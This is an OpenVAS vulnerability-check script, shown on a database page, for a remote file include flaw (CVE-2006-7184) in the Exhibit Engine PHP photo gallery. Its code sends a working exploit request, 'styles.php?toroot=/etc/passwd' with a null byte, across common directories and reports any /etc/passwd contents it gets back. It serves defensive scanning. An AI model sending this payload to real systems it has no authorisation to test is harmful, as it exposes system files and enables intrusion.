Lucene search

K
openvasThis script is Copyright (C) 2006 Justin SeitzOPENVAS:80058
HistoryOct 24, 2008 - 12:00 a.m.

Exhibit Engine toroot Parameter Remote File Include Vulnerability

2008-10-2400:00:00
This script is Copyright (C) 2006 Justin Seitz
plugins.openvas.org
11

0.036 Low

EPSS

Percentile

90.7%

The remote web server contains a PHP script that is affected by a
remote file include issue.

Description:

The remote web server is running Exhibit Engine, a PHP based photo
gallery management system.

The version of Exhibit Engine installed on the remote host fails to
sanitize input to the ‘toroot’ parameter before using it in the
‘styles.php’ script to include PHP code. Provided PHP’s
‘register_globals’ setting is enabled, an unauthenticated attacker can
exploit this issue to view arbitrary files and execute arbitrary code,
possibly taken from third-party hosts, on the remote host.

# OpenVAS Vulnerability Test
# $Id: exhibit_engine_rfi.nasl 5779 2017-03-30 06:57:12Z cfi $
# Description: Exhibit Engine toroot Parameter Remote File Include Vulnerability
#
# Authors:
# Justin Seitz <[email protected]>
#
# Copyright:
# Copyright (C) 2006 Justin Seitz
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The remote web server contains a PHP script that is affected by a
remote file include issue. 

Description:

The remote web server is running Exhibit Engine, a PHP based photo
gallery management system. 

The version of Exhibit Engine installed on the remote host fails to
sanitize input to the 'toroot' parameter before using it in the
'styles.php' script to include PHP code.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker can
exploit this issue to view arbitrary files and execute arbitrary code,
possibly taken from third-party hosts, on the remote host.";

tag_solution = "No patches or upgrades have been reported by the vendor at this time.";

if(description)
{
  script_id(80058);
  script_version("$Revision: 5779 $");
  script_tag(name:"last_modification", value:"$Date: 2017-03-30 08:57:12 +0200 (Thu, 30 Mar 2017) $");
  script_tag(name:"creation_date", value:"2008-10-24 23:33:44 +0200 (Fri, 24 Oct 2008)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2006-7184");
  script_bugtraq_id(20793);
  script_name("Exhibit Engine toroot Parameter Remote File Include Vulnerability");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("This script is Copyright (C) 2006 Justin Seitz");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if(!can_host_php(port:port)) exit(0);

file = "/etc/passwd";

foreach dir( make_list_unique( "/gallery", "/photos", "/images", "/exhibit", "/exhibitengine", "/ee", cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";

  # Attack: Attempt a remote file include of /etc/passwd
  req = http_get(item:string(dir, "/styles.php?toroot=", file, "%00"),port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) continue;

  if (egrep(pattern:"root:.*:0:[01]:", string:res) ||
    string("main(", file, "\\0styles/original.php): failed to open stream") >< res ||
    string("main(", file, "): failed to open stream: No such file") >< res ||
    "open_basedir restriction in effect. File(" >< res)   {

    passwd = "";
    if (egrep(pattern:"root:.*:0:[01]:", string:res))
      passwd = res;

    if (passwd) {
      if (dir == "") dir = "/";
      info = string("The version of Exhibit Engine installed in directory '", dir, "'\n",
        "is vulnerable to this issue. Here are the contents of /etc/passwd\n",
        "from the remote host :\n\n", passwd);
    }
    else info = "";

    security_message(data:info, port:port);
    exit(0);
  }
}

exit( 99 );

0.036 Low

EPSS

Percentile

90.7%

Related for OPENVAS:80058